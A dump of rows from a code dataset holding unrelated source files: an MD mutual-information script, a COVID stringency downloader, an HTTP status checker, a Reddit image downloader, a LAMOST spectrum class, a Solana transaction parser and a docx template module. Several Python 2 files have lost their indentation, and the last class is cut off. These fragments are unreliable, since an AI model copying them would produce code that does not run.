    # joint distribution p(a, b); keys are (a, b) tuples
    dict1 = {}
    for key, grp in first["A"].groupby([first["A"], first["B"]]):
        dict1[key] = float(len(grp)) / total
    # marginals and entropies.
    # COMPAT FIX: group by the Series itself rather than a one-element list —
    # pandas >= 2.0 yields length-1 *tuple* keys for list-of-one groupers,
    # which would break the scalar indexing dict2[key[0]] below.
    Hx = 0.0
    dict2 = {}
    for key, grp in first["A"].groupby(first["A"]):
        p = float(len(grp)) / total
        Hx += p * -1 * math.log(p, 2)
        dict2[key] = p
    Hy = 0.0
    dict3 = {}
    for key, grp in first["B"].groupby(first["B"]):
        p = float(len(grp)) / total
        Hy += p * -1 * math.log(p, 2)
        dict3[key] = p
    # mutual information I(A;B)
    Ixy = 0.0
    for key in dict1:
        ratio = float(dict1[key]) / (dict2[key[0]] * dict3[key[1]])
        Ixy += dict1[key] * math.log(ratio, 2)
    return 2 * Ixy / (Hx + Hy)
def read_file_1(file,number1,number2):
# Read a distance table (columns 1 and 6, skipping a 2-line header) and
# return the per-frame minimum distance for residue pair (number1, number2).
dat1=np.genfromtxt(file,skip_header=2, usecols=(1,6))
df = DataFrame(dat1,columns=["frames","dist_%2d_%2d"%(number1,number2)])
mins=df["dist_%2d_%2d"%(number1,number2)].groupby(df["frames"]).min()
return mins
def read_file_2(file):
# Read a GROMACS .xvg mindist file (19 header lines) into a two-column frame.
dat1=np.genfromtxt(file,skip_header=19, usecols=(0,1))
df = DataFrame(dat1,columns=["frames","mindist"])
return df
#col=[]
#################################################################
#for i in xrange(10001):
# col.append("frame_%d"%i)
#mins_2=np.zeros(10001)
#for i in xrange(187,188):
# for j in xrange(135,136):
# mins=read_file("dist_%2d_%2d.data"%(i,j),i,j)
# mins_2=np.vstack((mins_2,mins.values))
#test=DataFrame(mins_2,columns=col)
#test.to_csv("./H_H6.csv")
#for i in xrange(10001):
# print test["frame_%d"%i].sort_values().index[0]
# print test["frame_%d"%i].sort_values().index[1]
# print test["frame_%d"%i].sort_values().index[2]
######################################################################
def get_auto_corr(timeSeries1_pre, timeSeries2_pre, k):
    """
    Lag-k correlation between two equal-length numpy series.

    Normalisation divides by sqrt(var * N) of each *full* series (its sum of
    squared deviations) — kept exactly as in the original implementation.
    Returns 0 when either series has zero variance.
    """
    l = len(timeSeries1_pre)
    timeSeries1 = timeSeries1_pre[0:l - k]
    timeSeries2 = timeSeries2_pre[k:]
    timeSeries1_mean = timeSeries1.mean()
    timeSeries2_mean = timeSeries2.mean()
    timeSeries1_std = np.sqrt(timeSeries1_pre.var() * len(timeSeries1_pre))
    timeSeries2_std = np.sqrt(timeSeries2_pre.var() * len(timeSeries2_pre))
    # FIX: this guard was re-evaluated on every loop iteration; a zero std
    # makes every term undefined, so bail out once up front instead.
    if timeSeries1_std == 0 or timeSeries2_std == 0:
        return 0
    auto_corr = 0
    for i in range(l - k):  # range (not xrange) keeps this Python-3 safe
        tmp = (timeSeries1[i] - timeSeries1_mean) * (timeSeries2[i] - timeSeries2_mean) / (timeSeries1_std * timeSeries2_std)
        auto_corr = auto_corr + tmp
    return auto_corr
#####################################################################################
def plot_auto_corr(timeSeries1_pre,timeSeries2_pre,k,number1,number2):
"""
k can not be beyound the length of timeSeries
"""
# Bar-plot the lag-1..lag-k correlations and save the figure; the residue
# pair numbers only label the output file. NOTE: uses Python 2 xrange.
timeSeriestimeSeries = pd.DataFrame(range(k))
for i in xrange(1,k+1):
timeSeriestimeSeries.loc[i-1] =get_auto_corr(timeSeries1_pre,timeSeries2_pre,i)
plt.bar(range(1,len(timeSeriestimeSeries)+1),timeSeriestimeSeries[0].values)
plt.savefig("./mind_hb_inter_%d_%d.png"%(number1,number2))
plt.show()
# Compute NMI between the global minimum-distance series and each residue
# pair's per-frame minimum distance. NOTE: Python 2 (xrange / print statement).
mindist= read_file_2("../cap_ALA/mindist_10000_Ala.xvg")
mindist=mindist["mindist"]
for i in xrange(183,195):
for j in xrange(130,182):
mins=read_file_1("./dist_%2d_%2d.data"%(i,j),i,j)
#tmp=df["hbnum_%d_%d"%(i,j)]
nmi=NMI(mindist.values,mins.values)
print i,j,"\t",nmi
############################################################################3
|
986,930 | fa71b49e6d9a79c4df430b40b9a5f8d7a7a5fc2a | #! /usr/bin/env python3
import json
import urllib.request
import pandas as pd
from extractData import *
# Countries to export; commented-out entries were deliberately disabled.
selectedCountries = ["China",
                     "Malaysia",
                     "Australia",
                     "New Zealand",
                     # "Italy",
                     # "Japan",
                     # "Singapore",
                     # "Norway",
                     "South Korea"
                     # "United Kingdom",
                     # "United States"
                     ]

dataPool = []
for country in selectedCountries:
    # country code plus the date of the first recorded case (DD/MM/YYYY)
    countryCode = getCodeDay1Date(country)[0].values[0][0]
    day1Date = getCodeDay1Date(country)[1].values[0][0].split("/")
    DD = day1Date[0]
    MM = day1Date[1]
    YYYY = day1Date[2]
    # zero-pad day/month to build an ISO-8601 date for the API
    if len(MM) == 1:
        MM = "0" + MM
    if len(DD) == 1:
        DD = "0" + DD
    dateInput = YYYY + "-" + MM + "-" + DD
    print(country, dateInput)
    # download raw json object
    url = "https://covidtrackerapi.bsg.ox.ac.uk/api/v2/stringency/date-range/" + dateInput + "/2020-05-07"
    data = urllib.request.urlopen(url).read().decode()
    # parse json object
    obj = json.loads(data)
    print(obj)
    dateData = obj["data"]
    dates = list(dateData.keys())  # list of dates covered by the response
    df = pd.DataFrame(columns=['DaySinceCase100', country])
    row = 0
    for date in dates:
        try:
            stringency = dateData[date][countryCode]["stringency_actual"]
        except Exception:
            # some dates have no entry for this country; record a blank
            # (narrowed from a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit)
            stringency = ""
        df.loc[row] = [row + 1, stringency]
        row = row + 1
    # BUG FIX: was `dataPool =+ [df]`, which rebinds dataPool to [df] on
    # every pass (unary plus) instead of appending to it.
    dataPool += [df]
print(dataPool)
# NOTE(review): only the *last* country's frame is written here — if every
# country should be exported, concatenate dataPool first. TODO confirm.
df.to_csv('exportStringencyScore.csv', index=False, header=True)
## Ref: https://plotly.com/python/line-charts/
# import plotly.graph_objects as go
# from plotly.subplots import make_subplots
# fig = make_subplots(
# rows=3, cols=2,
# specs=[
# [{}, {}],
# [{}, {}],
# [{"colspan": 2}, None],
# ],
# subplot_titles=countryCodesWanted)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[0]]
# ),
# row=1, col=1)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[1]]
# ),
# row=1, col=2)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[2]]
# ),
# row=2, col=1)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[3]]
# ),
# row=2, col=2)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[4]]
# ),
# row=3, col=1)
# fig.update_yaxes(range=[0, 100])
# fig.update_layout(
# showlegend=False,
# autosize=True,
# height=800,
# title_text="Stringency of each country")
# import dash
# import dash_core_components as dcc
# import dash_html_components as html
# app = dash.Dash()
# app.layout = html.Div([
# dcc.Graph(figure=fig)
# ])
# app.run_server(debug=True)
|
986,931 | 1497db63b47c656df1ff443cc69498e637b082c9 | #!/usr/bin/python
# -*-Python-script-*-
#
#/**
# * Title : http request status code
# * Auther : by Alex, Lee
# * Created : 06-11-2015
# * Modified : 06-18-2015
# * E-mail : cine0831@gmail.com
#**/
import os
import sys
import socket
import time
import threading
import httplib
import optparse
import time
import datetime
start = time.time()
lock = threading.Lock()
def myThread(url,fds, argv):
# Worker: open one HTTP(S) connection to *url*, issue the configured request,
# and print the status line (or the error) under the shared print lock.
# NOTE: Python 2 (httplib, print statement).
try:
if argv.proto == 'http':
httpconn = httplib.HTTPConnection(url, argv.port, timeout = 1)
if argv.proto == 'https':
httpconn = httplib.HTTPSConnection(url, argv.port, timeout = 1)
httpconn.connect()
httpconn.request(argv.method, argv.uri)
reqstat = httpconn.getresponse()
lock.acquire()
output = "%4s %s %3s %3s %s%s" % (reqstat.status, reqstat.reason, '', '', url, '\n')
print output,
lock.release()
httpconn.close()
except (httplib.HTTPException, socket.error) as ex:
lock.acquire()
output = " Error %s %20s%s" % (url, ex, '\n')
print output,
lock.release()
# NOTE(review): the log write below runs on both the success and the error
# path but is *not* protected by the lock — concurrent threads may
# interleave lines in result_log.txt. Confirm whether that is acceptable.
fds.writelines(output)
time.sleep(0)
return
def parsing(argv):
# Parse CLI options; exits (after printing help) on missing/invalid values.
# NOTE: Python 2 optparse + print statement.
proto = ['http','https']
method = ['GET','POST']
cmd = optparse.OptionParser()
cmd.usage = """
%prog -l [filename] -p [port] -P [http | https] -m [GET | POST] -u [uri]
"""
cmd.add_option('-l', action='store', type='string', dest='filename', help='file of server lists')
cmd.add_option('-p', action='store', type='string', dest='port', help='destination port')
cmd.add_option('-P', action='store', type='string', dest='proto', help='http or https')
cmd.add_option('-m', action='store', type='string',dest='method', help='http method GET / POST')
cmd.add_option('-u', action='store', type='string', dest='uri', default='/index.html', help='request uri | ex) /index.html'
)
cmd.add_option('-v', action='store_true', dest='verbose', help='show version and exit')
(options, args) = cmd.parse_args(argv)
if len(args) == 1:
cmd.print_help()
sys.exit()
if options.verbose == 1:
print 'HTTP Code checker ver 0.2'
sys.exit()
if options.proto not in proto:
cmd.print_help()
sys.exit()
if options.method not in method:
cmd.print_help()
sys.exit()
return options
def run(argv):
    """Spawn one checker thread per URL listed in argv.filename, wait for all
    of them, then close the input file and the result log."""
    try:
        fd = open(argv.filename)
        fd_log = open('result_log.txt', 'w')
        threads = []
        for line in fd:
            url = line.strip('\n')
            th = threading.Thread(target=myThread, args=(url, fd_log, argv))
            th.start()
            threads.append(th)
        for th in threads:
            th.join()
        # BUG FIX: `fd_log.close` / `fd.close` referenced the bound methods
        # without calling them, so the handles were never closed and the log
        # could stay unflushed.
        fd_log.close()
        fd.close()
    except (IOError):
        print('Can not open file')
    except (IndexError):
        print('Index Error')
def main():
# parse CLI options, then fan out one request thread per listed URL
opt = parsing(sys.argv[1:])
run(opt)
if __name__ == "__main__":
main()
# NOTE: Python 2 print statement; `start` is set at module import time
print "Elapsed time: %s" % (time.time() - start)
|
986,932 | 2f56d55f6c1bb846a482a114e9a0034e5354cde8 | n = int(input())
from collections import Counter

a = list(map(int, input().split()))
# PERF FIX: a.count(i) inside the loop made this O(n^2); count each value
# once instead. Behavior is unchanged: one entry is kept per *occurrence*
# of a value that appears an odd number of times.
occurrences = Counter(a)
z = [i for i in a if occurrences[i] % 2 == 1]
z.sort()
ans = 0
z.reverse()
# pair up the values in descending order and sum the gap inside each pair
for i in range(len(z) - 1):
    if i % 2 == 0:
        ans += z[i] - z[i + 1]
# FIX: the original line carried trailing table junk (" |") after print(ans)
print(ans)
986,933 | f5dffb00919686e58c4c0299daf08dc164a6d2d9 | #!/usr/bin/env python3
from astropy.io import fits
import scipy as sp
import matplotlib.pyplot as plt
from astropy.convolution import convolve, Box1DKernel
class Spectrum:
    """One LAMOST DR1 spectrum read from a .fits file.

    Exposes the trimmed flux/wavelength arrays plus simple photometric
    features: per-band pseudo-magnitudes and the six colour indices.
    """

    def __init__(self, path):
        # takes the file path of the .fits file as an argument
        # Boxcar smoothing width in pixels; 5 kernel widths are trimmed from
        # each edge to drop convolution edge effects.
        width = 10
        hdulist = fits.open(path)
        self.flux = hdulist[0].data[0]           # raw flux counts of the spectrum
        self.date = hdulist[0].header['DATE']    # date the observation was made
        self.CLASS = hdulist[0].header['CLASS']  # object LAMOST classification
        self.smoothFlux = convolve(self.flux, Box1DKernel(width))[5 * width:-5 * width]
        self.desig = hdulist[0].header['DESIG'][7:]  # designation of the object
        self.totCounts = sp.sum(self.flux)       # total counts, used as a feature
        # COEFF0 is the log10 wavelength of the first pixel, COEFF1 the log10
        # separation between pixels.
        init = hdulist[0].header['COEFF0']
        disp = hdulist[0].header['COEFF1']
        # wavelength of each kept pixel in Angstroms (same edge trim as flux)
        self.wavelength = 10 ** sp.arange(init, init + disp * (len(self.flux) - 0.9), disp)[5 * width:-5 * width]
        self.flux = self.flux[5 * width: -5 * width]
        hdulist.close()
        # elements, and the window in which their emission lines are seen
        self.lines = {'Iron': [3800, 3900]}
        # colour bands and their corresponding wavelength windows
        self.letters = {"B": [3980, 4920], "V": [5070, 5950], "R": [5890, 7270], "I": [7310, 8810]}
        # per-band pseudo-magnitudes, computed in the loop below.
        # BUG FIX: the placeholder dict listed a "K" band that nothing ever
        # fills (the loop writes B/V/R/I), leaving a stray zero entry.
        self.bands = {"B": 0, "V": 0, "R": 0, "I": 0}
        for letter in self.letters:
            # indices bounding this band's wavelength window
            lower = sp.searchsorted(self.wavelength, self.letters[letter][0], side='left')
            upper = sp.searchsorted(self.wavelength, self.letters[letter][1], side='right')
            bandFlux = self.smoothFlux[lower:upper]
            # negative counts are unphysical; exclude them from the mean
            bandFlux[bandFlux < 0] = sp.nan
            self.bands[letter] = -2.5 * sp.log10(sp.nanmean(bandFlux))
        # colour indices (differences of band magnitudes)
        self.BV = self.bands['B'] - self.bands['V']
        self.BR = self.bands['B'] - self.bands['R']
        self.BI = self.bands['B'] - self.bands['I']
        self.VR = self.bands['V'] - self.bands['R']
        self.VI = self.bands['V'] - self.bands['I']
        self.RI = self.bands['R'] - self.bands['I']

    def plotFlux(self, ax=None, Tpred=None, Teff=None, element=None, colour='#1f77b4', label=None, log=True):
        """Plot the spectrum, optionally overlaying scaled blackbody curves
        for a predicted and/or effective temperature, and an inset zoom on an
        element's emission-line window."""
        if not ax:
            fig, ax = plt.subplots()
        ax.plot(self.wavelength, self.flux, color=colour, label=label)
        if Tpred:
            h = 6.63e-34
            c = 3e8
            k = 1.38e-23
            # ideal blackbody curve for temperature Tpred
            E = (8 * sp.pi * h * c) / ((self.wavelength * 1e-10) ** 5 * (sp.exp(h * c / ((self.wavelength * 1e-10) * k * Tpred)) - 1))
            # normalise by the total-counts ratio so the curve overlays the data
            fudge = self.totCounts / sp.sum(E)
            self.bbFlux = fudge * E
            ax.plot(self.wavelength, self.bbFlux, ls='--', label='Predicted', color='r')
        if Teff:
            h = 6.63e-34
            c = 3e8
            k = 1.38e-23
            # ideal blackbody curve for temperature Teff
            E = (8 * sp.pi * h * c) / ((self.wavelength * 1e-10) ** 5 * (sp.exp(h * c / ((self.wavelength * 1e-10) * k * Teff)) - 1))
            fudge = self.totCounts / sp.sum(E)
            self.bbFlux = fudge * E
            ax.plot(self.wavelength, self.bbFlux, ls=':', label='Effective', color='g')
        if log:
            ax.set_yscale('log')
        if element in self.lines:
            # NOTE(review): `fig` only exists when no axis was passed in, so
            # calling with ax=... *and* element=... raises NameError — confirm
            # whether the inset should attach to ax.figure instead.
            ax1 = fig.add_axes([0.6, 0.55, 0.25, 0.25])
            ax1.plot(self.wavelength, self.flux)
            ax1.set_title(element)
            ax1.set_xlim(self.lines[element])
            ax1.set_xticks(self.lines[element])
            ax1.set_yscale('log')
|
986,934 | 5baa83b4dab007d4227a8593dd25874ceaedd64c | __author__ = 'David Rapoport'
import requests
import os
from urllib2 import urlopen
import json
import datetime
from PIL import Image
from StringIO import StringIO
import sys
import time
import stat
import subprocess
import wx
from sys import argv
reload(sys)
sys.setdefaultencoding('UTF-8')
def fixCWKD():
"""Change the working directory to the Desktop on the current drive."""
# NOTE(review): hard-coded per-user Windows path; "CWKD" is presumably a
# typo for "CWD". Confirm before reuse on another machine.
path =os.getcwd()
# keep only the drive prefix, e.g. "C:\"
path = path[0:3]
path=path+"Users\\David Rapoport\\Desktop"
print path
os.chdir(path)
fixCWKD()
attempts=0
def fixURL(url):
    """Normalise an image URL: strip anything after a known image extension,
    or append '.jpg' when no known extension is present."""
    # checked in the same precedence order as before: .jpg, .gif, .png
    for ext in ('.jpg', '.gif', '.png'):
        if url.find(ext) >= 0:
            # drop trailing characters (query strings, fragments) one at a
            # time until the URL ends with the extension
            while not url.endswith(ext):
                url = url[:-1]
            return url
    return url + '.jpg'
def fixCaptions(capt):
    """Sanitise a caption for use as a Windows file name.

    Characters illegal in file names are deleted or replaced by spaces, and
    the result is capped at 190 characters.
    """
    # deleted outright
    for ch in '":\\':
        capt = capt.replace(ch, '')
    # replaced by a space
    for ch in '/?|*<>':
        capt = capt.replace(ch, ' ')
    if len(capt) > 190:
        capt = capt[:190]
    return capt
# Housekeeping: delete the folder of downloads from four days ago, then
# create (and chdir into) today's folder. NOTE: Python 2 throughout.
today=datetime.datetime.now()
delta = datetime.timedelta(4)
fourAgo= today-delta
fourString = "Reddit's best for "+str(fourAgo.month) + "_" + str(fourAgo.day) + "_" + str(fourAgo.year)
if os.path.exists(fourString):
os.chdir(fourString)
for files in os.listdir("C:\\Users\\David Rapoport\\Desktop\\"+fourString):
if os.path.isdir(files):
os.chdir(files)
for subfiles in os.listdir("C:\\Users\\David Rapoport\\Desktop\\"+fourString+"\\"+files):
os.remove(subfiles)
os.chdir("..")
subprocess.Popen("rmdir " + "\"" + files + "\"", stdout=subprocess.PIPE, shell=True)
else: os.remove(files)
os.chdir("..")
print os.getcwd()
time.sleep(30)
subprocess.Popen("rmdir " + "\"" + fourString + "\"", stdout=subprocess.PIPE, shell=True)
current =str(today.month) + "_" + str(today.day) + "_" + str(today.year)
current = "Reddit's best for "+ current
print os.getcwd()
if( not os.path.exists(current)): os.makedirs(current,stat.S_IWRITE)
os.chdir(current)
print os.getcwd()
# Main loop: log in to reddit, read the front page JSON, and download every
# imgur link (albums into sub-folders); retry up to 6 times on any error.
while attempts <=5:
try:
# NOTE(review): the password is read from a plaintext file on disk —
# confirm this is acceptable for this personal script.
passWordFile = open('../redditPassword.txt','r')
password=passWordFile.read()
redditUrl= "http://www.reddit.com/.json"
user_pass_dict ={"api_type": "json", "passwd": password, "rem": True, "user":"drapter4325"}
#remove quotes from password
#login = requests.post(r"http://www.reddit.com/api/login",data=paramaters)
session = requests.session()
session.headers.update({'User-Agent' : 'just doing it for fun \u\drapter4325'})
login = session.post(r'https://ssl.reddit.com/api/login', data=user_pass_dict)
loginjson = json.loads(login.content)
session.modhash=loginjson['json']['data']['modhash']
urlInfo = session.get(redditUrl)
urls = list()
data=urlInfo.json()
captions=list()
#subprocess.call(["echo","eureka"])
# collect all imgur links plus their post titles from the front page
for children in data['data']['children']:
test =str(children['data']['url'])
if test.find('imgur.com')>=0:
urls.append(test)
captions.append(str(children['data']['title']))
j=0
for pictureURL in urls:
import urllib
captions[j]=fixCaptions(captions[j])
# album URL: scrape the album page for full-resolution links and save
# each image into a folder named after the caption
if pictureURL.find("/a/")>=0 and not os.path.exists(captions[j]):
os.makedirs(captions[j],stat.S_IWRITE)
os.chdir(captions[j])
albumText=urllib.urlopen(pictureURL).read()
album=albumText.split("\n")
albumURL= list()
for lines in album:
if lines.find("View full resolution")>=0:
albumURL.append("http://" + lines[23:46])
k=1
for links in albumURL:
#print links
file=open(str(k)+links[-4:],"wb")
pic= urllib.urlopen(links)
file.write(pic.read())
file.close()
k=k+1
os.chdir("..")
j=j+1
continue
# single image: normalise the URL and save it under the caption name
elif not os.path.exists(captions[j]):
pictureURL=fixURL(pictureURL)
print pictureURL
print captions[j] + pictureURL[-4]
file=open(captions[j]+pictureURL[-4:],"wb")
k= urllib.urlopen(pictureURL)
file.write(k.read())
file.close()
j=j+1
else: j=j+1
attempts=6
except Exception as e:
# show the failure in a wx dialog, wait, then retry
print str(e)
attempts= attempts+1
app=wx.App(False)
frame = wx.Frame(None, wx.ID_ANY, 'error occured')
error = wx.MessageDialog(frame, str(e),"ERROR",wx.ICON_ERROR)
frame.Show(False)
error.ShowModal()
time.sleep(30)
|
986,935 | 82211b8aa766f6752b9f2505c23d1d332454137a | from typing import Optional, List, Tuple
from agoraapi.common.v3 import model_pb2
from agora import solana
from agora.solana import memo, token, system
from .creation import Creation
from .invoice import InvoiceList, Invoice
from .memo import AgoraMemo
from .payment import ReadOnlyPayment
from .transaction_type import TransactionType
def parse_transaction(
tx: solana.Transaction, invoice_list: Optional[model_pb2.InvoiceList] = None
) -> Tuple[List[Creation], List[ReadOnlyPayment]]:
"""Parses payments and creations from a Solana transaction.
:param tx: The transaction.
:param invoice_list: (optional) A protobuf invoice list associated with the transaction.
:return: A Tuple containing a List of :class:`ReadOnlyPayment <agora.model.payment.ReadOnlyPayment>` objects and a
List of :class:`Creation <agora.model.creation.Creation>` objects.
"""
payments = []
creations = []
invoice_hash = None
if invoice_list:
invoice_hash = InvoiceList.from_proto(invoice_list).get_sha_224_hash()
text_memo = None
agora_memo = None
il_ref_count = 0
invoice_transfers = 0
has_earn = False
has_spend = False
has_p2p = False
app_index = 0
app_id = None
i = 0
while i < len(tx.message.instructions):
if _is_memo(tx, i):
decompiled_memo = solana.decompile_memo(tx.message, i)
memo_data = decompiled_memo.data.decode('utf-8')
# Attempt to pull out an app ID or app index from the memo data.
#
# If either are set, then we ensure that it's either the first value for the transaction, or that it's the
# same as a previously parsed one.
#
# Note: if both an app id and app index get parsed, we do not verify that they match to the same app. We
# leave that up to the user of this SDK.
try:
agora_memo = AgoraMemo.from_b64_string(memo_data)
except ValueError:
text_memo = memo_data
if text_memo:
try:
parsed_id = app_id_from_text_memo(text_memo)
except ValueError:
i += 1
continue
if app_id and parsed_id != app_id:
raise ValueError('multiple app IDs')
app_id = parsed_id
i += 1
continue
# From this point on we can assume we have an agora memo
fk = agora_memo.foreign_key()
if invoice_hash and fk[:28] == invoice_hash and fk[28] == 0:
il_ref_count += 1
if 0 < app_index != agora_memo.app_index():
raise ValueError('multiple app indexes')
app_index = agora_memo.app_index()
if agora_memo.tx_type() == TransactionType.EARN:
has_earn = True
elif agora_memo.tx_type() == TransactionType.SPEND:
has_spend = True
elif agora_memo.tx_type() == TransactionType.P2P:
has_p2p = True
elif _is_system(tx, i):
create = system.decompile_create_account(tx.message, i)
if create.owner != token.PROGRAM_KEY:
raise ValueError('System::CreateAccount must assign owner to the SplToken program')
if create.size != token.ACCOUNT_SIZE:
raise ValueError('invalid size in System::CreateAccount')
i += 1
if i == len(tx.message.instructions):
raise ValueError('missing SplToken::InitializeAccount instruction')
initialize = token.decompile_initialize_account(tx.message, i)
if create.address != initialize.account:
raise ValueError('SplToken::InitializeAccount address does not match System::CreateAccount address')
i += 1
if i == len(tx.message.instructions):
raise ValueError('missing SplToken::SetAuthority(Close) instruction')
close_authority = token.decompile_set_authority(tx.message, i)
if close_authority.authority_type != token.AuthorityType.CLOSE_ACCOUNT:
raise ValueError('SplToken::SetAuthority must be of type Close following an initialize')
if close_authority.account != create.address:
raise ValueError('SplToken::SetAuthority(Close) authority must be for the created account')
if close_authority.new_authority != create.funder:
raise ValueError('SplToken::SetAuthority has incorrect new authority')
# Changing of the account holder is optional
i += 1
if i == len(tx.message.instructions):
creations.append(Creation(initialize.owner, initialize.account))
break
try:
account_holder = token.decompile_set_authority(tx.message, i)
except ValueError:
creations.append(Creation(initialize.owner, initialize.account))
continue
if account_holder.authority_type != token.AuthorityType.ACCOUNT_HOLDER:
raise ValueError('SplToken::SetAuthority must be of type AccountHolder following a close authority')
if account_holder.account != create.address:
raise ValueError('SplToken::SetAuthority(AccountHolder) must be for the created account')
creations.append(Creation(account_holder.new_authority, initialize.account))
elif _is_spl_assoc(tx, i):
create = token.decompile_create_associated_account(tx.message, i)
i += 1
if i == len(tx.message.instructions):
raise ValueError('missing SplToken::SetAuthority(Close) instruction')
close_authority = token.decompile_set_authority(tx.message, i)
if close_authority.authority_type != token.AuthorityType.CLOSE_ACCOUNT:
raise ValueError('SplToken::SetAuthority must be of type Close following an assoc creation')
if close_authority.account != create.address:
raise ValueError('SplToken::SetAuthority(Close) authority must be for the created account')
if close_authority.new_authority != create.subsidizer:
raise ValueError('SplToken::SetAuthority has incorrect new authority')
creations.append(Creation(create.owner, create.address))
elif _is_spl(tx, i):
cmd = token.get_command(tx.message, i)
if cmd == token.Command.TRANSFER:
transfer = token.decompile_transfer(tx.message, i)
# TODO: maybe don't need this check here?
# Ensure that the transfer doesn't reference the subsidizer
if transfer.owner == tx.message.accounts[0]:
raise ValueError('cannot transfer from a subsidizer-owned account')
inv = None
if agora_memo:
fk = agora_memo.foreign_key()
if invoice_hash and fk[:28] == invoice_hash and fk[28] == 0:
# If the number of parsed transfers matching this invoice is >= the number of invoices,
# raise an error
if invoice_transfers >= len(invoice_list.invoices):
raise ValueError(
f'invoice list doesn\'t have sufficient invoices for this transaction (parsed: {invoice_transfers}, invoices: {len(invoice_list.invoices)})')
inv = invoice_list.invoices[invoice_transfers]
invoice_transfers += 1
payments.append(ReadOnlyPayment(
transfer.source,
transfer.dest,
tx_type=agora_memo.tx_type() if agora_memo else TransactionType.UNKNOWN,
quarks=transfer.amount,
invoice=Invoice.from_proto(inv) if inv else None,
memo=text_memo if text_memo else None
))
elif cmd != token.Command.CLOSE_ACCOUNT:
# closures are valid, but otherwise the instruction is not supported
raise ValueError(f'unsupported instruction at {i}')
else:
raise ValueError(f'unsupported instruction at {i}')
i += 1
if has_earn and (has_spend or has_p2p):
raise ValueError('cannot mix earns with P2P/spends')
if invoice_list and il_ref_count != 1:
raise ValueError(f'invoice list does not match to exactly one memo in the transaction (matched {il_ref_count})')
if invoice_list and len(invoice_list.invoices) != invoice_transfers:
raise ValueError(f'invoice count ({len(invoice_list.invoices)}) does not match number of transfers referencing '
f'the invoice list ({invoice_transfers})')
return creations, payments
def _is_memo(tx: solana.Transaction, index: int) -> bool:
# True when the instruction at *index* targets the SPL memo program
return tx.message.accounts[tx.message.instructions[index].program_index] == memo.PROGRAM_KEY
def _is_spl(tx: solana.Transaction, index: int) -> bool:
# True when the instruction at *index* targets the SPL token program
return tx.message.accounts[tx.message.instructions[index].program_index] == token.PROGRAM_KEY
def _is_spl_assoc(tx: solana.Transaction, index: int) -> bool:
# True when the instruction at *index* targets the associated-token-account program
return tx.message.accounts[tx.message.instructions[index].program_index] == \
token.ASSOCIATED_TOKEN_ACCOUNT_PROGRAM_KEY
def _is_system(tx: solana.Transaction, index: int) -> bool:
    """Return True when the instruction at *index* targets the system program."""
    # FIX: the annotation read `solana.transaction` (lowercase module) instead
    # of the `solana.Transaction` type used by the sibling helpers.
    return tx.message.accounts[tx.message.instructions[index].program_index] == system.PROGRAM_KEY
def app_id_from_text_memo(text_memo: str) -> str:
    """Extract the app ID from a '1-<appid>[-...]' text memo.

    Raises ValueError when the memo is not version '1', has no second
    segment, or carries an invalid app ID.
    """
    segments = text_memo.split('-')
    if len(segments) < 2 or segments[0] != "1":
        raise ValueError('no app id in memo')
    candidate = segments[1]
    if not is_valid_app_id(candidate):
        raise ValueError('no valid app id in memo')
    return candidate
def is_valid_app_id(app_id: str) -> bool:
    """An app ID is valid iff it is 3 to 4 alphanumeric characters."""
    return 3 <= len(app_id) <= 4 and app_id.isalnum()
986,936 | 268a7b7a594ada5751936ba1ae5e9e9526a7326a | # !/usr/bin/env python
# coding: utf-8
import os
import jinja2
from wildzh.utils import constants
__author__ = 'zhouhenglc'
abs_dir = os.path.abspath(os.path.dirname(__file__))
temp_dir = os.path.join(abs_dir, 'docx_template')
_ENV = jinja2.Environment()
class XmlObj(object):
    """Base class for objects rendered through a docx XML jinja2 template."""

    temp_name = ""   # template file name under docx_template/
    temp_str = None  # lazily-loaded template text, cached per class
    env = _ENV

    def __new__(cls, *args, **kwargs):
        # Load and cache this class's template on first instantiation.
        if cls.temp_str is None:
            temp_path = os.path.join(temp_dir, cls.temp_name)
            if not temp_path.endswith('.template'):
                temp_path += '.template'
            with open(temp_path, encoding=constants.ENCODING) as r:
                cls.temp_str = r.read()
        return object.__new__(cls)

    def __init__(self):
        pass

    @classmethod
    def transfer(cls, s):
        """Escape the five XML special characters in *s*."""
        # BUG FIX: the replacement table had lost its XML entities (every
        # pair mapped a character to itself), making this method a no-op.
        # '&' must be escaped first so later entities are not double-escaped.
        _d = ["&", "&amp;", "<", "&lt;", ">", "&gt;", "'", "&apos;",
              '"', "&quot;"]
        for i in range(0, len(_d), 2):
            s = s.replace(_d[i], _d[i + 1])
        return s

    def _to_xml(self, **kwargs):
        # Render this object's template with the given context.
        t = self.env.from_string(self.temp_str)
        r = t.render(**kwargs)
        return r

    def to_xml(self):
        return self._to_xml()
class ParagraphXmlObj(XmlObj):
    # Renders a docx paragraph composed of text and/or image runs.
    temp_name = 'paragraph'

    def __init__(self, runs=None, **kwargs):
        """
        outline_level new support 1 2, if add should update word/styles.xml
        """
        super().__init__()
        self._runs = []
        self._outline_level = None
        self.runs = runs
        # Setting outline_level after runs also clears font_size on the runs
        # (see the outline_level setter below).
        self.outline_level = kwargs.get('outline_level', None)

    @property
    def runs(self):
        return self._runs

    @runs.setter
    def runs(self, runs):
        # Accepts a bare string or a list/tuple of items; dict items with a
        # 'url' key become image runs, everything else becomes a text run.
        self._runs = []
        kwargs = {}
        if self.outline_level:
            # Outlined (heading) paragraphs inherit the style's font size.
            kwargs['font_size'] = None
        if isinstance(runs, str):
            self._runs.append(RunTextXmlObj(runs, **kwargs))
        elif isinstance(runs, (list, tuple)):
            for run in runs:
                if isinstance(run, dict) and 'url' in run:
                    self._runs.append(RunImageXmlObj(run))
                else:
                    self._runs.append(RunTextXmlObj(run, **kwargs))

    @property
    def outline_level(self):
        return self._outline_level

    @outline_level.setter
    def outline_level(self, v):
        self._outline_level = v
        if self._outline_level:
            # Clear explicit font sizes so the outline style applies.
            for run in self.runs:
                run.font_size = None

    def to_xml(self):
        # Render each run, then splice them into the paragraph template.
        runs = [x.to_xml() for x in self._runs]
        kwargs = {'runs': runs, 'outline_level': self.outline_level}
        return self._to_xml(**kwargs)
class ParagraphPageXmlObj(XmlObj):
    # Page-break paragraph; rendered entirely by its template.
    temp_name = 'paragraph_page'
class RunTextXmlObj(XmlObj):
